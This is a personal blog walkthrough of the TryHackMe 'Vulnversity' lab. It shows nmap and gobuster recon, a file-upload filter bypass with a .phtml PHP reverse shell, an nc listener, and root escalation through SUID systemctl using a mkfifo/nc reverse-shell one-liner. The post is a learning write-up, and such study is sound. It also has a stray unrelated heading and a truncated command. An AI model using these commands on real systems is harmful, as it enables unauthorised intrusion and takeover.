Day 083 #FromZeroToHacker – Vulnversity

Time to learn about active recon, web app attacks and privilege escalation with a simulated target.

Let’s learn about it in our daily #FromZeroToHacker challenge.

Table of contents
Introduction
What have I learnt today?
Stats
Resources

Introduction to Cryptography for Dummies

We have been learning about reconnaissance, enumeration, privilege escalation, etc, but in a separate way. Let’s put together our hacking knowledge to (pretend we are) hacking a remote system.

What have I learnt today?

Reconnaissance

Normal scan
nmap -sV <TARGET_IP>

Scan the first 400 ports
nmap -sV <TARGET_IP> -p-400

Scan the OS
nmap -sV <TARGET_IP> -O

Increase the verbosity of your scan
nmap -sV <TARGET_IP> -v

Locating directories using Gobuster

Gobuster is a tool used to bruteforce URIs (Directories and files), DNS subdomains and virtual host names.

gobuster dir -u http://<TARGET_IP>:<TARGET_PORT> -w <WORDLIST>

Extra flags: -e prints the full URLs in your console, -U and -P username and password for basic auth.

Compromise the Webserver

We have found a form to upload files. Let’s upload and execute a payload to compromise the Webserver.

After many tries, .php doesn’t work, neither .php5 or other .php alternatives. We can try manually, but why not use Burp Suite to automate this process?

  1. Open Burp Suite
  2. Upload a random file and submit it to capture the request. Then, send it to the Intruder.
  3. Click on Payloads, select Sniper and add this to the payloads: .php, .php3, .php4, .php5, .phtml.
  4. Run the attack. The only valid extension is .phtml.

We can upload a .php reverse shell hidden as .phtml.

  1. Download a reverse PHP shell such as this one. Modify it to change the default IP for yours.
  2. Rename the file to shell.phtml (the name doesn’t matter, the extension does).
  3. We have found that the website has a /internal/ directory, but it is everything there? Let’s scan gobuster dir -u http://<TARGET_IP>:3333/internal/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
  4. It has another directory inside, /uploads/, could it be here where our file will be? Let’s see if there are more directories inside: gobuster dir -u http://<TARGET_IP>:3333/internal/uploads -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
  5. Upload your file. It should be inside /internal/uploads/, so visit that URL.
  6. Our malicious file is uploaded. Time to open a listener on our computer with nc -lvnp 1234.
  7. Open the reverse shell file. The browser seems like it is loading the page but nothing happens. Good. That means that it is interacting with our terminal.
Uploaded shell
Reverse shell

Remember that you can improve your shell:

  • python -c 'import pty;pty.spawn("/bin/bash")' spawns a better shell
  • export TERM=xterm gives us access to term commands like clear
  • stty raw -echo; f

Privilege escalation

Our user is www-data, hardly any admin. Let’s escalate our privileges to become a super user.

In Linux, SUID (Set owner UserID upon execution) is a particular type of file permission given to a file. These temporary permissions let a user run the program or file with the permission of the file owner (and sometimes this means the admin).

In this case, a mistake has been made: /usr/bin/passwd has SUID permissions, so we can change any password. ANY.

SUID file

We can find any SUID file with the current user with find / -user root -perm -4000 -exec ls -ldb {} \;.

Yes, /bin/systemctl (which manages system and service configurations) is vulnerable!

First, let’s create a file on the victim system that will execute a reverse shell:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LOCAL_IP> <LOCAL_PORT> >/tmp/f" > /tmp/shell.sh

(I have found this on GitHub Reverse Shells)

Then, we create a service and execute this service with systemctl (Code from GTFOBins):

TF=$(mktemp).service

echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "bash /tmp/shell.sh"
[Install]
WantedBy=multi-user.target' > $TF

/bin/systemctl link $TF
/bin/systemctl enable --now $TF

Now, we have a shell as a root user 🙂

Summary

Today we have revisited concepts such as:

  • Reconnaissance.
  • Locating directories with Gobuster
  • Compromising a Webserver with a PHP payload.
  • Privilege escalation.

Stats

From 49.775th to 48.986th.

Here is also the Skill Matrix:

Skills Matrix

Resources

Random Room

TryHackMe: Vulnversity

Other resources

Burp Suite
PHP Reverse Shell
SUID
GitHub Reverse Shells
GTFOBins: systemctl